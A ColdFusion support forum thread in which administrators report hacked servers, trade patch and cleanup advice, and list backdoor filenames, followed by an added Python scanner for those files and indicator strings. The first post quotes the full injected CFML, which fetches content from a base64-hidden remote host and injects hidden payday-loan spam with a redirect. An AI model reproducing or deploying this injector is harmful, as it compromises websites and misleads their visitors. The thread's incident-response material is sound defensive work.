Yesterday some of our hosted sites were hacked using the code pasted below. We're running CF 8.01 and I'm wondering if there is a cumulative security patch that we can apply or if I should just apply every security patch that I can find. I noticed that this particular vulnerability was patched for CF9 and 10 about six weeks ago.
Here's the hack:
<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)><cfsavecontent variable="paga"><CFHTTP METHOD = "Get" URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver">
<cfset mmy = cfhttp.FileContent><cfoutput>
#mmy#
</cfoutput>
</cfsavecontent>
<CFHTTP METHOD = "Get" URL = "#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#">
<cfset cfs = cfhttp.FileContent>
<cfif (FindNoCase("</div>",paga) GT 0)>
<cfset paga = replace(paga, "</div>", "</div>#cfs#", "one")>
<cfelseif (FindNoCase("</table>",paga) GT 0)>
<cfset paga = replace(paga, "</table>", "</table>#cfs#", "one")>
<cfelseif (FindNoCase("</a>",paga) GT 0)>
<cfset paga = replace(paga, "</a>", "</a>#cfs#", "one")>
<cfelse>
<cfset paga = replace(paga, "</body>", "#cfs#</body>", "one")>
</cfif>
<cfoutput>
#paga#
</cfoutput>
<cfabort>
</cfif>
<cffunction name="hSWaawe">
<cfargument name="HxzcGlk">
<cfset Ypg = ToString(ToBinary(HxzcGlk))>
<cfreturn Ypg>
</cffunction>
<html>
<head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.thehiltonorlando.com/">
</head>
<body>
<br>
<br>
<br>
<br>
<center>
<a href="http://www.thehiltonorlando.com/">This page has moved. Please click here if you are not automatically redirected in a moment...</a><script language="JavaScript">function zdrViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','9977918890','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}zdrViewState();
</script>
<p class="zdroq">
Most of the time, the borrower would <a href="http://www.paydayloans-online-uk.co.uk/" title="Payday">payday</a> be the one jeopardized. Applying to various payday loan sites could create suspicion to the lender <a href="http://payday-loans-fts.co.uk/" title="Payday Loans">payday loans</a> and this could make the approval process unnecessarily burdening. Having a checking account is also a <a href="http://best-rates-payday-loans.co.uk/" title="Http://best-rates-payday-loans.co.uk/">http://best-rates-payday-loans.co.uk/</a> must. They would also need this in order to withdraw money from your account when the payment is <a href="http://bad-credit-payday.co.uk/" title="Payday Loans Bad Credit">payday loans bad credit</a> due. In the long run, you would see that they have high interest rates that would be equivalent to wasting your <a href="http://payday-loans-eng.co.uk/" title="Payday Loans Uk">payday loans uk</a> money. </p>
</center>
</body>
</html>
Thanks in advance.
--Jeremy
Hi Jeremy
Can you please provide the CVE code?
Regards
Swaraj
These are for CF9 and 10. I've found nothing for CF8 yet.
CVE-2013-0625, CVE-2013-0629, CVE-2013-0631 and CVE-2013-0632
http://www.adobe.com/support/security/bulletins/apsb13-03.html
Hi Jeremy
Below lines are mentioned in the article:
Note that ColdFusion customers using an unsupported version of ColdFusion (including ColdFusion 8.x and earlier) can protect themselves from CVE-2013-0625, CVE-2013-0629 and CVE-2013-0632 by configuring the following:
Can you please try them?
Regards
Swaraj
Swaraj, thanks for the quick response. I'll apply these patches and settings asap.
--Jeremy
My company is running CF 9.0 and we patched our servers last week. However, we got hacked this weekend as well. They added that code, plus a JavaScript snippet, to every index.cfm file on our server (hundreds of files).
RDS is disabled, there is now an RDS password, and the CF Admin has a password. If anyone has any information on how these hackers got in it would be greatly appreciated.
Yes, I would like to know how this all happens as well - this hacking business in CF. Any clues?
We are going to install the patch tomorrow when my network guy gets in. It worries me that sduncanute has installed already and is still having issues.
Part of the issue *may* be related to having the cfide/administrator folder exposed to outside users. Be sure you block remote access to that folder and perhaps also the cfide/adminapi folder (which is where I got hacked).
NOTE: Blocking the /cfide folder may break some CF features, like CFFORM, so leave access for that.
I am not sure this will work, but it may help.
I just had a crazy morning trying to figure out why our site was breaking, posting crazy text, ruining our redirect to mobile site, etc. Then I found this post and saw the code that I discovered on our site with Firebug that matched exactly what you posted. We are running CF9, and you say there is a patch? Where might we find that?
Thanks for your help.
The CF9 patch is here : http://helpx.adobe.com/coldfusion/kb/coldfusion-security-hotfix-apsb13-03.html
I had this same problem this morning, and I am running 9.0.1 and already have hf901-00008.jar installed, which means I have that patch already. Any other ideas??
Hi PocoDiablo and sduncanute
Have you had chance to apply this http://www.adobe.com/support/security/bulletins/apsb13-03.html for the same reasons?
Regards
Swaraj
Albusteck,
As noted, I have gone through that bulletin and I am running the latest jar file. I've already done everything on that list. Now what? This was patched weeks ago.
Sue
Hi Swaraj, I did in fact apply that patch to my servers last Monday.
Those that have already applied the latest patch on CF9/10 but have been hacked: if you have a file /CFIDE/h.cfm, /CFIDE/i.cfm or /CFIDE/help.cfm, it is possible you had already been hit before applying the patch and still had a backdoor on your server. Note the file could be pretty much anywhere, but under /CFIDE somewhere is a likely location.
It is also possible that you have common third party software with a vulnerability that was hit, among many other things. It would be a good idea to review the web server logs around the time of the incident to see if you can uncover anything.
If you find something that appears to be a new exploit you should send it to the Adobe Product Security Incident Response Team rather than posting it here: http://www.adobe.com/support/security/alertus.html
In addition to applying patches you should also follow the ColdFusion Lockdown Guides:
Pete Freitag,
HackMyCF.com
Pete,
I have contacted Adobe and sent them off a bunch of my files at their request. I just saw this message and went looking and yes, I had the h.cfm in my CFIDE root directory with a December 25th date.
I found those lockdown guides not long ago and have gone through all of it for our new server, but didn't for this one.
Any other files I should be looking for?
Pete, my server does indeed have those files - /CFIDE/h.cfm /CFIDE/i.cfm.
They appeared on 1/2/2013, which is significantly after the previously mentioned hotfix released on Jan 15th, 2013:
http://www.adobe.com/support/security/bulletins/apsb13-03.html
So, I have located the h.cfm and i.cfm files. What are you suggesting to do with these files?
If you have the /CFIDE/h.cfm or /CFIDE/i.cfm files they are not part of ColdFusion, and were placed there by an attacker. So you should delete them! You should probably do a fresh OS, CF install at this point, be sure to use new passwords for everything.
There have been reports of files being added under the /CFIDE/adminapi directory as well in recent attacks, so you will want to look there as well (check file timestamps on all your files in CFIDE), but as I said consider doing a full reinstall.
--
Pete Freitag
HackMyCF.com - ColdFusion Server Security Scanner
FuseGaurd.com - Web Application Firewall for ColdFusion
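A defender-side triage script, added here and not part of any post in this thread, that walks a CFIDE directory looking for the attacker-placed filenames named above (h.cfm, i.cfm, help.cfm, and adss.cfm / fusebox.cfm under adminapi/customtags) and for indicator strings visible in the injected code Jeremy posted (the "Archivver" user-agent check, the ToString(ToBinary(...)) decoder, the zdrViewState script). The directory tree it scans is constructed in a temporary folder; the sample file contents are stand-ins, not real backdoors.

```python
import os
import tempfile

# Indicator strings taken from the injected code quoted earlier in the thread.
INJECTION_MARKERS = (
    'FindNoCase("Archivver"',          # user-agent check that stops the page re-fetching itself
    "ToString(ToBinary(",              # base64 decoder used to hide the payload URL
    "zdrViewState",                    # obfuscated JavaScript that hides the spam block
    'cfsavecontent variable="paga"',   # buffer the injected page is assembled in
)

# Relative paths under CFIDE reported in this thread as attacker-placed files.
SUSPECT_PATHS = {
    "h.cfm", "i.cfm", "help.cfm",
    os.path.join("adminapi", "customtags", "adss.cfm"),
    os.path.join("adminapi", "customtags", "fusebox.cfm"),
}

def scan_cfide(cfide_root):
    """Return sorted (relative_path, reason) tuples for files that need review."""
    findings = []
    for dirpath, _dirs, files in os.walk(cfide_root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, cfide_root)
            if rel in SUSPECT_PATHS:
                findings.append((rel, "known backdoor filename"))
            # Decode loosely: the injected templates are plain ASCII, so a
            # stray non-UTF-8 byte elsewhere must not abort the scan.
            with open(full, "rb") as fh:
                text = fh.read().decode("utf-8", errors="ignore")
            hits = [m for m in INJECTION_MARKERS if m in text]
            if hits:
                findings.append((rel, "injection markers: " + ", ".join(hits)))
    return sorted(findings)

def demo():
    """Build a constructed CFIDE tree in a temp dir, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as base:
        os.makedirs(os.path.join(base, "adminapi", "customtags"))
        os.makedirs(os.path.join(base, "scripts"))
        samples = {  # constructed stand-in contents, not real attacker files
            "h.cfm": "<cfoutput>placeholder</cfoutput>",
            os.path.join("adminapi", "customtags", "adss.cfm"): "<cfset x = 1>",
            os.path.join("scripts", "index.cfm"):
                '<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)>...</cfif>',
            "application.cfm": "<cfset d = ToString(ToBinary(u))>",
            os.path.join("scripts", "clean.cfm"): "<cfoutput>hello</cfoutput>",
        }
        for rel, body in samples.items():
            with open(os.path.join(base, rel), "w") as fh:
                fh.write(body)
        return scan_cfide(base)
```

Run scan_cfide() against the real CFIDE folder and review every hit alongside file timestamps and the web server logs, as Pete suggests; a clean scan does not prove the server is clean, since the thread also reports a modified application.cfm and files added elsewhere.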
There is a file called fusebox.cfm with a time stamp date of 2/6/13 in the adminapi/customtags directory. Is this legit? And if so, what is it?
Also a file called adss.cfm with a 2/3/13 time stamp in the same directory. This seems to be part of the attack. Can you verify this to be true?
Thanks.
These files are part of the hack. Make a copy of these and then delete them. I kept a copy of everything so that I can share the info with Adobe, who are following up with this.
Do a search on your whole server for anything else that has those date stamps that looks weird.
I zapped my entire website and restored it, and then went through all of the log files, and the whole Cold Fusion installation looking for odd items.
We are moving to a new server as soon as I finish migrating my Access databases to MS SQL, otherwise I would be doing a full re-install.
Sue
The h.cfm file was added to my server on 11/17/2012. This was done by creating a scheduled task, running it, and then deleting the task so I would not see it. Yes, my /administrator and /adminapi directories were still available. I realize I've been too lax -- have been using ColdFusion for over a decade with no major security issues, so I didn't pay close attention to locking out these directories to public IP addresses.
The h.cfm file was called several times over December and January, but nothing else was done.
On 2/3 some text was added to several index.cfm pages, but they were not the default pages and therefore the attack didn't take down the server.
I removed h.cfm, i.cfm, fusebox.cfm and adss.cfm. I renamed h.cfm, found the password inside it, and tried it. I was able to see what the attacker could see. Passwords for data sources, in particular, were available.
After plugging the hole, then removing the files, I would suggest changing all datasource passwords, as the attackers would have gained access to them.
Will restricting access to the CFIDE folder prevent this exploit, or is it more involved than that?
My server was also hacked with the "payday loans" code appearing on most index.cfm and index.html pages. After deleting the injected code, it reappeared 3 days later. I believe I have since discovered the real culprit -- a modified application.cfm in the CFIDE directory.
EcleticDan - what version of CF were you running, and were you fully patched? Any suggestions on what we can do to protect ourselves? I locked out /cfide/administrator so no one can get to it unless you RDC to the server.